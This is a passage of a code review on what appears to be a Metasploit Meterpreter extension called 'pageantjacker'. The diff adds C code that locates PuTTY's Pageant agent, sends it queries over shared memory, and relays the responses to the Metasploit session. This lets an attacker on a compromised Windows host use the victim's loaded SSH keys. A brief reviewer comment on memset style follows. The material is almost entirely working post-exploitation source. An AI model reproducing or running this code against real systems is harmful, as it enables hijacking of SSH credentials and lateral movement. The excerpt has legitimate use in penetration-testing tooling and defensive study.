source/extensions/pageantjacker/pageantjacker.c

```diff
@@ -0,0 +1,186 @@
+		dprintf("[PJ(request_pageant_send_query)] Freed results blob");
+	}
+
+	// Transmit the packet to metasploit
+	packet_transmit_response(ERROR_SUCCESS, remote, response);
+
+	return ERROR_SUCCESS;
+}
+
+
+/*!
+ * @brief Initialize the server extension
+ */
+DWORD __declspec(dllexport) InitServerExtension(Remote *remote)
+{
+	hMetSrv = remote->met_srv;
+
+	command_register_all(customCommands);
+
+	return ERROR_SUCCESS;
+}
+
+/*!
+ * @brief Deinitialize the server extension
+ */
+DWORD __declspec(dllexport) DeinitServerExtension(Remote *remote)
+{
+	command_deregister_all(customCommands);
+
+	return ERROR_SUCCESS;
+}
+
+/*!
+* @brief Get the name of the extension.
+* @param buffer Pointer to the buffer to write the name to.
+* @param bufferSize Size of the \c buffer parameter.
+* @return Indication of success or failure.
+*/
+DWORD __declspec(dllexport) GetExtensionName(char* buffer, int bufferSize)
+{
+	strncpy_s(buffer, bufferSize, "pageantjacker", bufferSize - 1);
+	return ERROR_SUCCESS;
+}
+
+PAGEANTQUERYRESULTS send_query_to_pageant(byte *query, unsigned int querylength) {
+
+	char strPuttyRequest[23]; // This will always be 23 chars
+	COPYDATASTRUCT pageant_copy_data;
+	unsigned char *filemap_pointer;
+	HANDLE filemap;
+	PAGEANTQUERYRESULTS ret;
+	HWND hPageant;
+	unsigned int protocol_return_length;
+	unsigned int api_result;
+	void *memcpy_result;
+
+	// Initialise the results arrays
+	memset((void *) &ret, 0, sizeof(ret));
+	memset((void *) &strPuttyRequest, 0, sizeof(strPuttyRequest));
+	ret.result = FALSE;
+	ret.error_message = PAGEANTJACKER_ERROR_NOERROR;
+
+	if (hPageant = FindWindowW(PAGEANT_NAME, PAGEANT_NAME)) {
+
+		dprintf("[PJ(send_query_to_pageant)] Pageant Handle is %x",hPageant);
+
+		// Generate the request string and populate the struct
+		if (_snprintf_s((char *)&strPuttyRequest, sizeof(strPuttyRequest), _TRUNCATE, "PageantRequest%08x", (unsigned int)GetCurrentThreadId())) { 
+			pageant_copy_data.dwData = AGENT_COPYDATA_ID;
+			pageant_copy_data.cbData = sizeof(strPuttyRequest);
+			pageant_copy_data.lpData = &strPuttyRequest;
+			dprintf("[PJ(send_query_to_pageant)] Request string is at 0x%p (%s)", &pageant_copy_data.lpData, pageant_copy_data.lpData);
+
+			// Pageant effectively communicates with PuTTY using shared memory (in this case, a pagefile backed memory allocation).
+			// It will overwrite this memory block with the result of the query.
+			filemap = CreateFileMappingA(INVALID_HANDLE_VALUE, NULL, PAGE_READWRITE, 0, AGENT_MAX, (char *) &strPuttyRequest);
+			if (filemap && filemap != INVALID_HANDLE_VALUE) {
+				dprintf("[PJ(send_query_to_pageant)] CreateFileMappingA returned 0x%x", filemap);
+				if (filemap_pointer = MapViewOfFile(filemap, FILE_MAP_WRITE, 0, 0, 0)) {
+					dprintf("[PJ(send_query_to_pageant)] MapViewOfFile returned 0x%x", filemap_pointer);
+
+					// Initialise and copy the request to the memory block that will be passed to Pageant.
+					memset((void *) filemap_pointer, 0, AGENT_MAX);

```

Comment:
For Windows, it's good to use `ZeroMemory` instead of `memset`, as it reads a little better. The `(void*)` cast here shouldn't be needed.